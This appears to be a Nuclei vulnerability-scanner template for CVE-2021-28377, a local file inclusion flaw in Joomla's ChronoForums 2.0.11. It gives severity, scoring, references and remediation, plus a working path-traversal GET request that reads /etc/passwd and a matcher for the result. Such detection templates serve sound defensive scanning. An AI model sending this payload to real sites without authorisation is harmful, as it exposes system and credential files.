id: CVE-2021-28377 info: name: Joomla! ChronoForums 2.0.11 - Local File Inclusion author: 0x_Akoko severity: medium description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. impact: | The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution. remediation: | Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability. reference: - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00106 epss-percentile: 0.43237 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 vendor: chronoengine product: chronoforums framework: joomla tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine http: - method: GET path: - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502200aa77498a3fc354033b687fad03e0e5ce81021c57bff959969552cb0d9c7f20e022100fdc33c51660f0ba7914598df61940bde9ff15361a513d29fa69ae9dbfaaacbc9:922c64590222798bb761d5b6d8e72950